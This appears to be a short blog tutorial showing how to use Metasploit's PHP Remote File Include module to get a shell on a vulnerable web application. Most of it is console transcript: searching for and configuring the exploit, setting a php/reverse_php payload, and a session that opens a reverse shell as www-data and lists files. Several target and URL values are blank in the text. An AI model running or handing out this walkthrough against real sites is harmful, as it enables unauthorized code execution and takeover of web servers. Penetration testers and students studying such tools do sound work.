Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.

Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of:


and make your PHPURI


let's see it in action

msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...


Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit

msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info

Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent

Provided by:

Available targets:
Id Name
-- ----
0 Automatic

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload information:
Space: 32768

This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the

msf exploit(php_include) > set PHPURI /
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST
msf exploit(php_include) > exploit

[*] Started bind handler
[*] Using URL:
[*] PHP include server started.
[*] Sending /1/
[*] Command shell session 1 opened ( -> at Sun May 09 21:37:26 -0400 2010

0.jpeg	license.txt	slog_users.txt	 version.txt
1.jpeg		index.asp	old
adminlog.php	install.txt	readme.txt	slogin_genpass.php	launch.asp	slog_users.php

id uid=33(www-data) gid=33(www-data) groups=33(www-data)